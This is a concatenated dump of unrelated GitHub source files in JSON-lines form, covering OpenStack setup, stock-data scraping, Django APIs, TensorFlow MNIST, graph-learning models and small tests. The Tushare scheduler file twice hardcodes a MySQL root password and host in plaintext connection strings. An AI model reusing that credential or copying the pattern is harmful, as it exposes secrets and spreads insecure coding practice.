shell=True)\n subprocess.call(\"\"\" for service in api conductor scheduler novncproxy; do systemctl enable --now openstack-nova-$service; done \"\"\", shell=True)\n subprocess.call(\"\"\" openstack compute service list \"\"\", shell=True)\n setupKVM_func()\n subprocess.call(\"dnf --enablerepo=centos-openstack-victoria,epel,powertools -y install openstack-nova-compute\",shell=True)\n subprocess.call(\" dnf --enablerepo=centos-openstack-victoria -y install openstack-selinux\",shell=True)\n subprocess.call(\"firewall-cmd --add-port=5900-5999/tcp --permanent\",shell=True)\n subprocess.call(\"firewall-cmd --reload\",shell=True)\n print(\"Start Nova Compute.\")\n subprocess.call(\"systemctl enable --now openstack-nova-compute\",shell=True)\n subprocess.call(\"\"\" su -s /bin/bash nova -c \"nova-manage cell_v2 discover_hosts\" \"\"\", shell=True)\n subprocess.call(\"openstack compute service list\",shell=True)\n \n\n\n\n# subprocess.call(\"\", shell=True)\n# subprocess.call(\"\"\" \"\"\", shell=True)\n\n\ndef __main():\n checkOSInfo_func()\n checkDiskInfo_func()\n listFile_func()\n checkAllVariable_func()\n checkUser_func()\n getRequirements_func()\n prepareDB_func()\n setupKeystone_func()\n # configureGlance_func()\n # configureNova_func()\n # activeKeyston_func()\n # listFile_func()\n # checkUser_func()\n # subprocess.call(\"ls -al\",shell=True )\n # mariadbCheck_func()\n # getRequirements_func()\n # replace_line('/Users/hungnt/project/bash/op/py/dmhieu', 3,\"condihieu3\" )\n # add_line('/Users/hungnt/project/bash/op/py/dmhieu', \"abc\" ,\"condihieu2.7\")\n # prepareDB_func()\n # print(command)\n # print(\"openstack endpoint create --region RegionOne image public http://%s:9292\"%hostname_controller)\n # findAndReplace_func(\"glance-api.conf\",\"10.0.0.30\",\"CONTROLER_HOST\")\n print('SETUP COMPLETE')\n\nif __name__ == \"__main__\":\n __main()","repo_name":"hungnt612/OP-jits","sub_path":"py/op.py","file_name":"op.py","file_ext":"py","file_size_in_byte":19397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42726904218","text":"\"\"\"Hardware FonduerModel.\"\"\"\nimport pickle\n\nimport numpy as np\nfrom emmental.data import EmmentalDataLoader\nfrom pandas import DataFrame\n\nfrom fonduer.learning.dataset import FonduerDataset\nfrom fonduer.packaging import FonduerModel\nfrom fonduer.parser.models import Document\nfrom tests.shared.hardware_lfs import TRUE\nfrom tests.shared.hardware_utils import get_implied_parts\n\nATTRIBUTE = \"stg_temp_max\"\n\n\nclass HardwareFonduerModel(FonduerModel):\n \"\"\"Customized FonduerModel for hardware.\"\"\"\n\n def _classify(self, doc: Document) -> DataFrame:\n # Only one candidate class is used.\n candidate_class = self.candidate_extractor.candidate_classes[0]\n test_cands = getattr(doc, candidate_class.__tablename__ + \"s\")\n\n features_list = self.featurizer.apply(doc)\n # Convert features into a sparse matrix\n F_test = FonduerModel.convert_features_to_matrix(\n features_list[0], self.key_names\n )\n\n test_dataloader = EmmentalDataLoader(\n task_to_label_dict={ATTRIBUTE: \"labels\"},\n dataset=FonduerDataset(ATTRIBUTE, test_cands, F_test, self.word2id, 2),\n split=\"test\",\n batch_size=100,\n shuffle=False,\n )\n\n test_preds = self.emmental_model.predict(test_dataloader, return_preds=True)\n positive = np.where(np.array(test_preds[\"probs\"][ATTRIBUTE])[:, TRUE] > 0.7)\n true_preds = [test_cands[_] for _ in positive[0]]\n\n pickle_file = \"tests/data/parts_by_doc_dict.pkl\"\n with open(pickle_file, \"rb\") as f:\n parts_by_doc = pickle.load(f)\n\n df = DataFrame()\n for c in true_preds:\n part = c[0].context.get_span()\n doc = c[0].context.sentence.document.name.upper()\n val = c[1].context.get_span()\n for p in get_implied_parts(part, doc, parts_by_doc):\n entity_relation = (doc, p, val)\n df = df.append(\n DataFrame([entity_relation], columns=[\"doc\", \"part\", \"val\"])\n )\n return df\n","repo_name":"HazyResearch/fonduer","sub_path":"tests/shared/hardware_fonduer_model.py","file_name":"hardware_fonduer_model.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":395,"dataset":"github-code","pt":"53"} +{"seq_id":"75368647528","text":"from multiprocessing import Pool\nfrom sqlalchemy import create_engine\nfrom data_api.tushare_api import TushareApi\nimport sys\nimport os\nimport pandas as pd\nfrom loguru import logger\nimport schedule\nfrom time import sleep\nfrom tasks.basic import StockBasic\n\nlocation = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nlog_file_path = os.path.join(location,f'logs/daily_task.log')\nlogger.add(log_file_path,rotation=\"daily\", encoding=\"utf-8\", enqueue=True, retention=\"10 days\")\n\nstart = '20080103'\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\nconn = create_engine(\n'mysql+pymysql://root:543049601a@192.168.61.158:33063/tushare')\n\nreset_dict = {'trade_date': '交易日期', 'buy_sm_vol': '小单买入量(手)',\n 'buy_sm_amount': '小单买入金额(万元)', 'sell_sm_vol': '小单卖出量(手)',\n 'sell_sm_amount': '小单卖出金额(万元)', 'buy_md_vol': '中单买入量(手)',\n 'buy_md_amount': '中单买入金额(万元)', 'sell_md_vol': '中单卖出量(手)',\n 'sell_md_amount': '中单卖出金额(万元)', 'buy_lg_vol': '大单买入量(手)',\n 'buy_lg_amount': '大单买入金额(万元)', 'sell_lg_vol': '大单卖出量(手)',\n 'sell_lg_amount': '大单卖出金额(万元)', 'buy_elg_vol': '特大单买入量(手)',\n 'buy_elg_amount': '特大单买入金额(万元)', 'sell_elg_vol': '特大单卖出量(手)',\n 'sell_elg_amount': '特大单卖出金额(万元)', 'net_mf_vol': '净流入量(手)',\n 'net_mf_amount': '净流入额(万元)', \"pct_change\": '涨跌幅', \"close\": '收盘价',\n 'change': '涨跌额', 'open': '开盘价', 'high': '最高价', 'low': '最低价', 'pre_close': '昨收价',\n 'vol_ratio': '成交量比', 'turn_over': '换手率', 'swing': '振幅', 'vol': '成交量',\n 'amount': '成交额', 'selling': '卖出量', 'buying': '买入量', 'strength': '强弱指数',\n 'activity': '活跃度', 'avg_turnover': '笔换手', 'attack': '攻击波', 'pe': '市盈率(动)',\n 'float_share': '流通股本(亿)', 'total_share': '总股本(亿)', 'total_assets': '总资产(亿)',\n 'liquid_assets': '流动资产(亿)', 'fixed_assets': '固定资产(亿)', 'reserved': '公积金',\n 'reserved_pershare': '每股公积金', 'eps': '每股收益', 'bvps': '每股净资产', 'pb': '市净率',\n 'undp': '未分配利润', 'per_undp': '每股未分配利润', 'rev_yoy': '收入同比(%)',\n 'profit_yoy': '利润同比(%)', 'gpr': '毛利率(%)', 'npr': '净利润率(%)',\n 'holder_num': '股东人数', 'his_low': '历史最低', 'his_high': '历史最高', 'cost_5pct': '5分位成本',\n 'cost_15pct': '15分位成本', 'cost_50pct': '50分位成本', 'cost_85pct': '85分位成本', 'cost_95pct': '95分位成本',\n 'weight_avg': '加权平均成本', 'winner_rate': '胜率', 'price': '成本价格', 'percent': '价格占比(%)', 'chip_distribute': '筹码分布(价格,占比)'}\n\n\n\n\nclass Daily(StockBasic):\n def __init__(self):\n StockBasic.__init__(self)\n \n def get_single_daily_normal(self, ts_code, trade_date):\n stock_daily = self.tushare.get_stock_daily(ts_code, trade_date)\n advanced_info = self.tushare.get_stock_advanced_info(\n ts_code, trade_date)\n moneyflow = self.tushare.get_stock_moneyflow(ts_code, trade_date)\n chip_winrate = self.tushare.get_chip_winrate(ts_code, trade_date)\n chip_distribute = self.tushare.get_chip_distribution(\n ts_code, trade_date)[self.now_date]\n # factor = self.tushare.get_factor(ts_code, trade_date)\n\n sum = {}\n sum.update(stock_daily[ts_code])\n sum.update(advanced_info[ts_code])\n sum.update(moneyflow[ts_code])\n sum.update(chip_winrate[ts_code])\n # sum.update(factor[ts_code])\n sum = self.tushare.reset_dict_key(sum, reset_dict)\n sum['筹码分布(价格,占比)'] = str(chip_distribute)\n del sum['未知']\n return sum\n\n\ndaily = Daily()\n\n# 获取当天的数据(每日定时19点获取)\n@logger.catch\ndef run_normal(code,date=None):\n if date:\n trade_time = date\n else:\n trade_time = daily.get_now_date()\n table_name = daily.get_table_name(code)\n df = pd.DataFrame.from_dict([daily.get_single_daily_normal(code, trade_time)])\n df.to_sql(table_name, conn, if_exists='append', index=False)\n logger.info('{}||时间:{}||更新完成'.format(table_name, trade_time))\n\ndef daily_task():\n if daily.check_trade_date():\n p = Pool(3)\n for code in daily.all_ts_code:\n p.apply_async(run_normal, args=(code,))\n p.close()\n p.join()\n\ndef handle_task(date):\n p = Pool(3)\n for code in daily.all_ts_code:\n p.apply_async(run_normal, args=(code, date))\n p.close()\n p.join()\n\ndef run_first(ts_code,table_name):\n\n print('开始初始化{}的表'.format(ts_code))\n conn = create_engine(\n'mysql+pymysql://root:543049601a@192.168.61.158:33063/tushare')\n mock_data = {'交易日期': '19900101', '涨跌幅': -1.3, '收盘价': 12.12, '涨跌额': -0.16, \n '开盘价': 12.25, '最高价': 12.25, '最低价': 11.99, '昨收价': 12.28, '成交量比': 0.9, \n '换手率': 0.51, '振幅': 2.12, '成交量': 991260.0, '成交额': 119755.57, '卖出量': 494426.0, \n '买入量': 496834.0, '强弱指数': -1.63, '活跃度': 4544.0, '笔换手': 0.0, '攻击波': 1.08, \n '市盈率(动)': 4.03, '流通股本(亿)': 194.06, '总股本(亿)': 194.06, '总资产(亿)': 54558.97, \n '流动资产(亿)': 0.0, '固定资产(亿)': 106.81, '公积金': 807.56, '每股公积金': 4.16, '每股收益': 0.65, \n '每股净资产': 19.42, '市净率': 0.62, '未分配利润': 1988.26, '每股未分配利润': 10.25, '收入同比(%)': -2.4, \n '利润同比(%)': 13.63, '毛利率(%)': 40.73, '净利润率(%)': 32.38, '股东人数': 506867, '小单买入量(手)': 286971, \n '小单买入金额(万元)': 34654.51, '小单卖出量(手)': 196225, '小单卖出金额(万元)': 23717.76, \n '中单买入量(手)': 320683, '中单买入金额(万元)': 38725.2, '中单卖出量(手)': 303389, '中单卖出金额(万元)': 36670.68, \n '大单买入量(手)': 257749, '大单买入金额(万元)': 31160.33, '大单卖出量(手)': 305641, '大单卖出金额(万元)': 36926.51, \n '特大单买入量(手)': 125858, '特大单买入金额(万元)': 15215.53, '特大单卖出量(手)': 186005, \n '特大单卖出金额(万元)': 22440.62, '净流入量(手)': -93510, '净流入额(万元)': -11203.89, '历史最低': 0.31, \n '历史最高': 24.79, '5分位成本': 8.23, '15分位成本': 11.83, '50分位成本': 13.03, '85分位成本': 17.59, '95分位成本': 21.91, \n '加权平均成本': 13.92, '胜率': 20.14, '成本价格': 24.79, '价格占比(%)': 0.05, '筹码分布(价格,占比)': '[[0.31, 0.04],[0.55,0.04]]'}\n a = pd.DataFrame.from_dict([mock_data])\n a.to_sql(table_name, conn, if_exists='replace', index=False)\n\n\nif __name__ == \"__main__\":\n schedule.every().day.at(\"19:00\").do(daily_task)\n task_no = int(input(\"请输入任务编号:1:每日任务,2:手动任务\"))\n if task_no == 1:\n while True:\n schedule.run_pending()\n sleep(1)\n elif task_no == 2:\n date = input(\"请输入日期:\")\n handle_task(date)\n","repo_name":"jsntcheng/new_trader_miao","sub_path":"tasks/daily.py","file_name":"daily.py","file_ext":"py","file_size_in_byte":8104,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30889516175","text":"import os\nfrom datetime import date\n\nfrom kaleidoscope import reader\n\n\ndef test_read_gallery(testing_gallery):\n \"\"\"Reader should properly read metadata of the gallery.\"\"\"\n gallery = reader.read_gallery(str(testing_gallery))\n assert gallery.title == \"Hello World\"\n assert gallery.author == \"Me\"\n assert len(gallery.albums) == 2\n\n\ndef test_skipping_nonalbum_dirs(testing_gallery):\n \"\"\"Directories without album.ini should be skipped\"\"\"\n testing_gallery.mkdir('not-album')\n gallery = reader.read_gallery(str(testing_gallery))\n assert len(gallery.albums) == 2\n\n\ndef test_read_album(testing_gallery):\n album_dir = str(testing_gallery.join(\"testing-album\"))\n album = reader.read_album(album_dir)\n assert album.name == \"testing-album\"\n assert album.title == \"Testing Album\"\n assert album.date == date(2017, 5, 15)\n assert len(album.sections) == 1\n assert album.sections[0].name == \"photos\"\n\n\ndef test_read_incomplete_album_info(testing_gallery):\n \"\"\"If album name and date are not specified, reader should derive them\n from directory properties.\n \"\"\"\n album_dir = str(testing_gallery.join(\"incomplete-album\"))\n album = reader.read_album(album_dir)\n assert album.name == \"incomplete-album\"\n assert album.title == \"incomplete-album\"\n assert album.date == date.today()\n\n\ndef test_read_photos(testing_gallery):\n album_dir = str(testing_gallery.join(\"testing-album\"))\n album = reader.read_album(album_dir)\n expected_photos = [\n (\"Photo1.jpg\", \"\", \"\"),\n (\"Photo2.jpg\", \"Caption\", \"Caption\"),\n (\"Photo3.jpg\", \"Long caption\", \"Long caption\"),\n (\"Photo4.jpg\", \"Long caption\", \"Long caption with hidden part\")\n ]\n for photo, (name, short_caption, long_caption) in \\\n zip(album.sections[0].photos, expected_photos):\n assert photo.name == name\n assert photo.short_caption == short_caption\n assert photo.long_caption == long_caption\n assert photo.source_path == os.path.join(album_dir, name)\n","repo_name":"sergejx/kaleidoscope","sub_path":"tests/test_reader.py","file_name":"test_reader.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29941436325","text":"def hola_mundo():\n print('Hola esto es una funcion')\n\n\nhola_mundo()\n\n\ndef multiplicar(valor, valor_2=90):\n print(valor * valor_2)\n\nmultiplicar(10, 55)\n\nnumero = 100\nnumero_2 = 50\n\nmultiplicar(numero)\n\n\ndef sumar_numeros(lista):\n total = 0\n for i in lista:\n if i < 11:\n total += i\n\n print(total)\n\nlista_numeros = [10, 5, 10, 8, 9, 55]\n\nsumar_numeros(lista_numeros)\n\n\ndef agregar(lista, numero):\n lista.append(numero)\n print(lista)\n\nagregar(lista_numeros, 'hola mundio')\n\nprint(lista_numeros)","repo_name":"MauriRubioJob/PrepClass-Python-JS","sub_path":"Python_Basic_Examples_For_Classes/Basic_Class_Alvaro/Clase 3/Ejemplos/funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40577241759","text":"from log import log\nimport sys\n\nfrom django.http import HttpResponse, JsonResponse, QueryDict\nfrom django.conf import settings\n\nfrom api.models import Audio, Sentence\nfrom api.auth import auth_user_id, auth_directory_id, auth_note_id, auth_audio_id, auth_sentence_id_shared, auth_sentence_id_edit\nfrom api.utils import coerce_to_post\nfrom api.es_client.es_client import es\n\n@auth_sentence_id_shared\ndef get_sentence_info(request):\n sentence_id = int(request.GET.get('sentence_id'))\n sentence = Sentence.objects.get(id=sentence_id)\n\n json_res = dict()\n json_res['audio_id'] = sentence.audio.id\n json_res['index'] = sentence.index\n json_res['started_at'] = sentence.started_at\n json_res['ended_at'] = sentence.ended_at\n json_res['content'] = sentence.content\n\n return JsonResponse(json_res)\n\n@auth_audio_id\ndef create_sentence(request):\n index = int(request.POST.get('index'))\n audio_id = int(request.POST.get('audio_id'))\n started_at = int(request.POST.get('started_at'))\n ended_at = int(request.POST.get('ended_at'))\n content = str(request.POST.get('content'))\n audio = Audio.objects.get(id=audio_id)\n user_id = audio.user.id\n \n sentence = Sentence.objects.create(\n index=index,\n audio_id=audio_id,\n user_id=user_id,\n started_at=started_at,\n ended_at=ended_at,\n content=content\n )\n\n json_res = dict()\n json_res['sentence_id'] = sentence.id\n \n # elasticsearch document create\n es_document = dict()\n es_document['sentence_id'] = sentence.id\n es_document['note_id'] = audio.note.id\n es_document['user_id'] = audio.user.id\n es_document['content'] = sentence.content\n es.create(index='sentence', body=es_document, id=sentence.id)\n\n return JsonResponse(json_res, status=201)\n\n@auth_sentence_id_shared\n@auth_sentence_id_edit\ndef update_sentence(request):\n coerce_to_post(request)\n\n sentence_id = int(request.PUT.get('sentence_id'))\n content = str(request.PUT.get('content'))\n sentence = Sentence.objects.get(id=sentence_id)\n \n sentence.content = content\n sentence.save()\n\n # elasticsearch document update\n es_document = dict()\n es_document['content'] = sentence.content\n es.update(index='sentence', body={'doc':es_document}, id=sentence.id)\n\n return HttpResponse(status=200)\n\n@auth_sentence_id_shared\n@auth_sentence_id_edit\ndef delete_sentence(request):\n coerce_to_post(request)\n\n sentence_id = int(request.DELETE.get('sentence_id'))\n sentence = Sentence.objects.get(id=sentence_id)\n\n sentence.delete()\n \n # elasticsearch document delete\n es.delete(index='sentence', id=sentence_id)\n\n return HttpResponse(status=200)\n\n@log\ndef api_note_sentence(request):\n try:\n if request.method == 'GET':\n return get_sentence_info(request)\n elif request.method == 'POST':\n return create_sentence(request)\n elif request.method == 'PUT':\n return update_sentence(request)\n elif request.method == 'DELETE':\n return delete_sentence(request)\n else:\n return HttpResponse(status=405)\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n return HttpResponse(status=400)","repo_name":"sjy366/lisn-django-api-server","sub_path":"api/views/views_sentence.py","file_name":"views_sentence.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72282273769","text":"def solution(s): # s는 10만개면 tuple은 500개? 정도 밖에 안됨\n answer = []\n \n tuple_list = []\n num = \"\"\n num_list = []\n openStatus = True\n for i in range(len(s)-1):\n c = s[i]\n if c.isdigit():\n num += c\n if c == \",\" and openStatus:\n num_list.append(int(num))\n num = \"\"\n elif c== \"{\": openStatus = True\n elif c == \"}\":\n num_list.append(int(num))\n num = \"\"\n openStatus = False\n tuple_list.append(num_list)\n num_list = []\n # print(tuple_list) #[[1, 2, 3], [2, 1], [1, 2, 4, 3], [2]]\n \n new_tuple_list = []\n tuples = set()\n for length in range(1,len(tuple_list)+1): # 1~4\n for number_set in tuple_list:\n if len(number_set) == length:\n for num in number_set:\n if not num in tuples:\n answer.append(num)\n tuples.add(num)\n return answer\n","repo_name":"yoo-myeong/Myeongorithm","sub_path":"python/프로그래머스_튜플.py","file_name":"프로그래머스_튜플.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12053009068","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport time\n\nimport tensorflow as tf\n\nfrom libs.utils.mnist import *\n\n__author__ = 'fyabc'\n\n\n# Constants.\nDisplayFreq = 100\nTrainIteration = 20000\nBatchSize = 50\n\n\n# Initializers.\n\ndef weight_variable(shape):\n return tf.Variable(tf.truncated_normal(shape, stddev=0.1))\n\n\ndef bias_variable(shape):\n # [NOTE] Use a slightly positive initial bias to avoid \"dead neurons\".\n return tf.Variable(tf.constant(0.1, shape=shape))\n\n\n# Convolutional layers.\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n\ndef main():\n # Get MNIST dataset.\n mnist = input_data.read_data_sets('MNIST_data/', one_hot=True)\n\n x, y_ = input_placeholders()\n\n # First convolutional layer\n\n # Weight shape: (patch_width, patch_height, input_channels, output_channels)\n # Bias shape: (output_channels,)\n W_conv1 = weight_variable([5, 5, 1, 32])\n b_conv1 = bias_variable([32])\n\n # x_image shape: (data_case, image_width, image_height, color_channels)\n x_image = tf.reshape(x, [-1, 28, 28, 1])\n\n h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n h_pool1 = max_pool_2x2(h_conv1)\n\n # Second convolutional layer\n\n W_conv2 = weight_variable([5, 5, 32, 64])\n b_conv2 = bias_variable([64])\n\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n h_pool2 = max_pool_2x2(h_conv2)\n\n # Densely connected layer\n # Reduced image size: 7 * 7, hidden size: 1024\n W_fc1 = weight_variable([7 * 7 * 64, 1024])\n b_fc1 = bias_variable([1024])\n\n h_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n # Dropout\n keep_prob = tf.placeholder(floatX)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n # Readout layer\n W_fc2 = weight_variable([1024, 10])\n b_fc2 = bias_variable([10])\n\n y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\n\n # Train and evaluate model\n cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # Summary\n summary_writer = tf.summary.FileWriter('./output/deep_mnist_logs', sess.graph)\n\n start_time = time.time()\n\n for i in range(TrainIteration):\n batch = mnist.train.next_batch(BatchSize)\n if i % DisplayFreq == 0:\n train_accuracy = accuracy.eval(feed_dict={\n x: batch[0], y_: batch[1], keep_prob: 1.0})\n print('Step %d, time %.2fs, training accuracy %.4f' % (i, time.time() - start_time, train_accuracy))\n train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n\n print('Test accuracy %.4f' % accuracy.eval(feed_dict={\n x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fyabc/Toys","sub_path":"LearnTensorFlow/deep_mnist.py","file_name":"deep_mnist.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7816213332","text":"from abc import ABC, abstractmethod\nfrom typing import Dict, Tuple\n\nimport torch\nfrom torch import nn, Tensor\nfrom torch.nn import Parameter\n\nfrom src.models.gcn import MetaDenseGCN\nfrom src.models.sampling import Sampler\nfrom src.utils.graph import (get_triu_values, triu_values_to_symmetric_matrix, is_square_matrix, cosine_similarity)\nfrom src.utils.tracking import setup_basic_logger\n\nlogger = setup_basic_logger()\n\n\nclass ParameterClamper(object):\n def __call__(self, module):\n for param in module.parameters():\n w = param.data\n w.clamp_(0.0, 1.0)\n\n\nclass GraphGenerativeModel(nn.Module, ABC):\n\n def __init__(self, sample_undirected: bool = True, *args, **kwargs):\n super(GraphGenerativeModel, self).__init__(*args, **kwargs)\n self.sample_undirected = sample_undirected\n\n def sample(self, *args, **kwargs) -> Tensor:\n probs = self.forward()\n edges = Sampler.sample(probs)\n return edges\n\n def project_parameters(self):\n pass\n\n def refine(self):\n logger.warn(f\"Model called to refine current parameters but method is not implemented. Ignore...\")\n\n @abstractmethod\n def statistics(self) -> Dict[str, float]:\n pass\n\n\nclass BernoulliGraphModel(GraphGenerativeModel):\n\n def __init__(self, init_matrix: Tensor, directed: bool = False):\n \"\"\"\n :param directed:\n :param init_matrix: Either symmetric matrix or flattened\n array of the values of the upper triangular matrix\n \"\"\"\n super(BernoulliGraphModel, self).__init__()\n assert is_square_matrix(init_matrix)\n\n self.directed = directed\n self.orig_matrix = init_matrix\n\n # Init Values\n probs = init_matrix if directed else get_triu_values(init_matrix)\n self.probs = Parameter(probs, requires_grad=True)\n\n def project_parameters(self):\n self.apply(ParameterClamper())\n\n def forward(self, *args, **kwargs) -> torch.Tensor:\n return self.probs if self.directed else triu_values_to_symmetric_matrix(self.probs) # type: ignore\n\n def statistics(self) -> Dict[str, float]:\n sample = self.forward()\n n_edges = sample.size(0) ** 2\n return {\n \"expected_num_edges\": sample.sum().item(),\n \"percentage_edges_expected\": sample.sum().item() / n_edges,\n \"mean_prob\": torch.mean(self.probs).item(),\n \"min_prob\": torch.min(self.probs).item(),\n \"max_prob\": torch.max(self.probs).item()\n }\n\n\nclass PairwiseEmbeddingSampler(GraphGenerativeModel):\n\n def __init__(self,\n n_nodes: int,\n embedding_dim: int,\n prob_pow: float = 1.0,\n init_bounds: float = 0.001):\n super(PairwiseEmbeddingSampler, self).__init__()\n self.embeddings = Parameter(torch.empty((n_nodes, embedding_dim)), requires_grad=True)\n self.prob_pow = prob_pow\n self.n_edges = n_nodes ** 2\n self.init_bounds = init_bounds\n\n self.reset_embeddings()\n\n def reset_embeddings(self):\n self.embeddings.data.uniform_(-self.init_bounds, self.init_bounds)\n\n def forward(self, *args, **kwargs) -> Tensor:\n return torch.sigmoid(self.embeddings @ self.embeddings.t()) ** self.prob_pow\n\n def sample(self, *args, **kwargs) -> Tensor:\n edge_probs = self.forward()\n edges = Sampler.sample(edge_probs, embeddings=self.embeddings)\n return edges\n\n def statistics(self) -> Dict[str, float]:\n probs = self.forward()\n return {\n \"expected_num_edges\": probs.sum().item(),\n \"percentage_edges_expected\": probs.sum().item() / self.n_edges\n }\n\n\nclass GraphProposalNetwork(GraphGenerativeModel):\n\n def __init__(self,\n features: Tensor,\n dense_adj: Tensor,\n dropout: float = 0.0,\n add_original: bool = False,\n embedding_dim: int = 128,\n probs_bias_init: float = 0.0,\n probs_factor_init: float = 1.0,\n prob_power: float = 1.0,\n use_sigmoid: bool = True,\n use_tanh: bool = False,\n normalize_similarities: bool = False\n ):\n super(GraphProposalNetwork, self).__init__()\n\n assert features.size(0) == dense_adj.size(0)\n assert is_square_matrix(dense_adj)\n assert not (use_sigmoid and use_tanh)\n assert probs_factor_init > 0.0\n\n self.original_features = features\n self.original_adj = dense_adj\n\n self.features = features\n self.adj = dense_adj\n self.n_edges = dense_adj.size(0) * dense_adj.size(1)\n self.num_features = features.size(1)\n self.add_original = add_original\n self.prob_power = prob_power\n self.use_sigmoid = use_sigmoid\n self.use_tanh = use_tanh\n self.normalize_similarities = normalize_similarities\n self.gcn = MetaDenseGCN(in_features=self.num_features,\n hidden_features=embedding_dim * 2,\n out_features=embedding_dim,\n dropout=dropout)\n\n self.probs_factor = Parameter(torch.tensor(probs_factor_init), requires_grad=True)\n self.probs_bias = Parameter(torch.tensor(probs_bias_init), requires_grad=True)\n\n self.embeddings_cached = None\n self.adj_cached = None\n\n def forward(self,\n *args,\n return_embeddings: bool = False,\n **kwargs) -> Tensor:\n new_adj, _ = self.calculate_edges_and_embeddings()\n return new_adj\n\n def calculate_edges_and_embeddings(self, *args, **kwargs) -> Tuple[Tensor, Tensor]:\n new_embeddings = self.gcn.forward_to_last_layer(self.features, self.adj)\n\n if self.normalize_similarities:\n similarity_matrix = cosine_similarity(new_embeddings, new_embeddings)\n else:\n similarity_matrix = new_embeddings @ new_embeddings.t()\n # Introduce bias for probabilities and e.g. make sigmoid steeper\n new_adj = self.probs_factor * similarity_matrix + self.probs_bias\n new_adj = torch.sigmoid(new_adj) if self.use_sigmoid else new_adj\n new_adj = torch.tanh(new_adj) if self.use_tanh else new_adj\n new_adj = new_adj + self.adj if self.add_original else new_adj\n new_adj = torch.clamp(new_adj, 0., 1.)\n return new_adj, new_embeddings\n\n def sample(self, *args, **kwargs) -> Tensor:\n edge_probs, embeddings = self.calculate_edges_and_embeddings()\n edges = Sampler.sample(edge_probs, embeddings=embeddings)\n self.adj_cached, self.embeddings_cached = edges, embeddings\n return edges\n\n def refine(self):\n if self.adj_cached is not None and self.embeddings_cached is not None:\n self.features = self.embeddings_cached\n self.adj = self.adj_cached\n\n def statistics(self) -> Dict[str, float]:\n probs = self.forward()\n return {\n \"expected_num_edges\": probs.sum().item(),\n \"percentage_edges_expected\": probs.sum().item() / self.n_edges,\n \"probs_factor\": self.probs_factor.item(),\n \"probs_bias\": self.probs_bias.item()\n }\n","repo_name":"andreas-grafberger/lds-gnn","sub_path":"src/models/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"19770535615","text":"# simple_app_code.py\nimport subprocess\n\nsource_file = \"../examples/simple_app.py\"\n\nfilename = \"source/simple_app_code_{:02d}.rst\"\nall_lines = []\ncount = 0\n\nwith open(source_file) as fobj:\n source_lines = fobj.readlines()\n\n\ndef save(count, text):\n\n prefix = \".. code-block:: python \\n\"\n suffix = \"..\"\n\n with open(filename.format(count), \"w\") as fobj:\n fobj.write(prefix)\n fobj.write(\"\\n\")\n\n fobj.writelines(text)\n fobj.write(suffix)\n\n count += 1\n return count\n\n\ndef find_block(start, end):\n\n spaces = 4\n temp = []\n append = False\n for line in source_lines:\n if end is not None and line.strip() == end:\n return \"\".join(temp)\n if append:\n temp.append(\" \" * spaces + line)\n if line.strip() == start:\n append = True\n\n return \"\".join(temp)\n\n\nlocations = [\n [\"# initialize\", \"# create some data\"],\n [\"# create some data\", \"# create resources\"],\n [\"# create resources\", \"# create meta resources\"],\n [\"# create meta resources\", \"# end create_resources\"],\n [\"# add resources to api\", None],\n]\n\nfor start, end in locations:\n text = find_block(start, end)\n count = save(count, text)\n","repo_name":"sidorof/flask-restful-dbbase","sub_path":"docsrc/simple_app_code.py","file_name":"simple_app_code.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5575365263","text":"# Merge all CHM output files into one netcdf file (easier to plot later)\n\n# Assumes:\n# 1) that output file name syntax is : XXX_out.txt where XXX is the three letter station/point code\n# 2) Time zone is in UTC\n\n# Saves to netcdf file in \\points\\ dir\nimport xarray as xr\nimport glob\nimport os\nimport sys\nimport imp\nimport pandas as pd\nimport datetime\n\n#EXP_names = 